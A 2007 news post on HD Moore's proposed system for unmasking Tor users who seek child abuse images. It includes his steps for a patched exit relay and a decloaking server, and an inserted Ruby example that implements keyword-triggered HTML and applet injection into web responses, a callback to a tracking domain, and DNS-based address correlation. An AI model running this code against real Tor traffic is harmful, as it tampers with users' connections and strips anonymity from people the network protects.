March 6th, 2007

Hacker builds tracking system to nab Tor pedophiles

Posted by Ryan Naraine @ 7:10 pm

Categories: Browsers, Exploit code, Hackers, Metasploit, Open source, Patch Watch, Privacy, Punditocracy, Spyware and Adware, Vulnerability research

Tags: DNS, IP, Server, Pedophile, Applet, Hacker, Ryan Naraine

Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures: running patched Tor servers (exit relays, since only they see the unencrypted web traffic and can alter it) and a "decloaking" engine that combines several side channels to identify the specific workstation a pedophile is using within an organization or residence. The engine recovers network addresses, not a physical location.

Moore first discussed his "countermeasures" at a meeting of the Austin Hackers Association (AHA) last summer, when it became clear that the EFF-backed anonymity/privacy network was being used for the most nefarious purposes. Further confirmation came last September, when German authorities cracked down on Tor node operators because of the proliferation of child porn.

In an e-mail interview, Moore said the plan is to release the source code, which will allow anyone to run a patched Tor server to help pinpoint pedophiles online.

Moore's description of the countermeasures:

1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.

2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

3. The decloak engine is based on the following techniques:

a) A unique identifier is created to track this user.

b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.

c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.

e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway.

f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.

As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea."
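The pipeline Moore describes, modelled end to end in Ruby (the language his patched server embeds), as an added example: this is not Moore's code or the Metasploit decloak engine. The tracking domain `decloak.example`, the placeholder trigger words, the beacon HTML, the channel names and the helper names are all assumptions made for illustration, and the HTTP messages, DNS packets and addresses are constructed from documentation ranges. It shows the exit-side hook that tags a triggered response with a per-user identifier (and recomputes Content-Length, which the post does not mention but a working injector must do), the server-side parsing of the raw DNS query that both the ISP resolver and the applet send, and the correlation of the four addresses under one identifier.

```ruby
require 'securerandom'

# Added example, not HD Moore's code. Hypothetical names: DECLOAK_DOMAIN,
# TRIGGER_WORDS (placeholders; the real keyword list is not on the page),
# the beacon HTML and the channel symbols are all assumptions.
DECLOAK_DOMAIN = 'decloak.example'
TRIGGER_WORDS  = %w[trigger-alpha trigger-beta]

# ---- exit-node side (steps 1-2): the Ruby hook on the patched relay ----

def new_tracking_id
  SecureRandom.hex(8)            # 16 hex chars, one per triggered response
end

def triggered?(request, response)
  text = (request + response).downcase
  TRIGGER_WORDS.any? { |w| text.include?(w) }
end

# The script tag makes the browser resolve <id>.DECLOAK_DOMAIN through its
# normal resolver (step b); the applet carries the id so the Java code can
# report the local address (step d) and send raw UDP past Tor (step e).
def beacon_html(id)
  host = "#{id}.#{DECLOAK_DOMAIN}"
  "<script src=\"http://#{host}/d.js\"></script>" \
  "<applet code=\"Decloak.class\" archive=\"http://#{host}/d.jar\" width=\"1\" height=\"1\">" \
  "<param name=\"id\" value=\"#{id}\"></applet>"
end

# Rewrite one plaintext HTTP response. Returns [response, id]; id is nil when
# nothing was injected. Content-Length must be recomputed or the browser
# drops the appended bytes; gzip/chunked bodies would need decoding first.
def inject_beacon(request, response)
  return [response, nil] unless triggered?(request, response)
  head, body = response.split("\r\n\r\n", 2)
  return [response, nil] if body.nil?
  id = new_tracking_id
  body = body.sub(%r{</body>}i) { |tag| beacon_html(id) + tag }
  body += beacon_html(id) unless body.include?(id)      # page without </body>
  head = head.sub(/^Content-Length:[^\r\n]*/i, "Content-Length: #{body.bytesize}")
  [head + "\r\n\r\n" + body, id]
end

# ---- decloak server side (steps b, e): the DNS channel ----

# RFC 1035 A query for `name`: the packet the ISP resolver sends on the
# browser's behalf and, separately, the packet the applet sends itself.
def build_dns_query(name, txid = rand(0..0xffff))
  qname = name.split('.').map { |l| [l.bytesize].pack('C') + l }.join + "\0"
  [txid, 0x0100, 1, 0, 0, 0].pack('n6') + qname + [1, 1].pack('n2')   # QTYPE A, QCLASS IN
end

# Read the first QNAME out of a query; rejects truncated or compressed names.
def parse_qname(packet)
  raise ArgumentError, 'short packet' if packet.bytesize < 12
  raise ArgumentError, 'no question' if packet[4, 2].unpack1('n').zero?
  pos, labels = 12, []
  loop do
    len = packet.getbyte(pos)
    raise ArgumentError, 'truncated qname' if len.nil?
    break if len.zero?
    raise ArgumentError, 'compression pointer in query' if len >= 0xc0
    raise ArgumentError, 'truncated label' if packet.bytesize < pos + 1 + len
    labels << packet.byteslice(pos + 1, len)
    pos += 1 + len
  end
  labels.join('.')
end

# "<id>.decloak.example" -> id; nil for any other name (scanner noise, typos,
# or a bare query for the tracking domain itself).
def tracking_id_from(qname)
  labels = qname.downcase.split('.')
  suffix = DECLOAK_DOMAIN.split('.')
  return nil unless labels.length == suffix.length + 1 && labels.last(suffix.length) == suffix
  labels.first =~ /\A\h{16}\z/ ? labels.first : nil
end

# ---- correlation (step f) ----
class DecloakDB
  CHANNELS = %i[tor_exit resolver internal external].freeze

  def initialize
    @rows = Hash.new { |h, k| h[k] = {} }
  end

  def record(id, channel, addr)
    raise ArgumentError, "unknown channel #{channel}" unless CHANNELS.include?(channel)
    @rows[id][channel] = addr
  end

  # UDP listener entry point. The same packet shape arrives on two channels;
  # only the source differs: the ISP resolver (b) or the user's NAT gateway (e).
  def record_dns(packet, src_addr, channel)
    id = tracking_id_from(parse_qname(packet))
    record(id, channel, src_addr) if id
    id
  end

  def report(id)
    @rows.fetch(id, {}).dup
  end

  def complete?(id)
    row = @rows.fetch(id, {})
    CHANNELS.all? { |c| row.key?(c) }
  end
end

# Constructed walk-through with RFC 5737 documentation addresses.
def demo
  request  = "GET /search?q=trigger-alpha HTTP/1.1\r\nHost: example.org\r\n\r\n"
  response = "HTTP/1.1 200 OK\r\nContent-Length: 33\r\n\r\n<html><body>results</body></html>"
  patched, id = inject_beacon(request, response)
  db = DecloakDB.new
  db.record(id, :tor_exit, '192.0.2.10')                   # source of the d.js fetch, via Tor
  db.record_dns(build_dns_query("#{id}.#{DECLOAK_DOMAIN}"), '198.51.100.53', :resolver)
  db.record(id, :internal, '192.168.1.23')                 # applet -> JavaScript -> d.js callback
  db.record_dns(build_dns_query("#{id}.#{DECLOAK_DOMAIN}"), '203.0.113.7', :external)
  [patched, id, db]
end

if __FILE__ == $PROGRAM_NAME
  patched, id, db = demo
  puts patched
  puts "#{id}: #{db.report(id)} complete=#{db.complete?(id)}"
end
```

Two practical points the post leaves implicit: the hook only works on plaintext HTTP, because an exit relay cannot alter a TLS-protected response without breaking the connection, and the raw UDP channel in step (e) exists only because the Java plugin talks to the network directly instead of through the browser's SOCKS proxy. A browser with Java disabled gives the engine nothing but the resolver channel, and only if the browser's DNS lookups are not themselves routed through the proxy.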

Ryan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal.


Talkback (most recent of 23)

but doesn't it break the whole point?
Kind of rules and kind of sucks.

What happens to all other legitimate uses of Tor? While it is cool to kick some paedophiles' butts, it pretty much renders Tor useless for a lot of its legitimate... (Read the rest)
Posted by: flpgdt | 01/26/10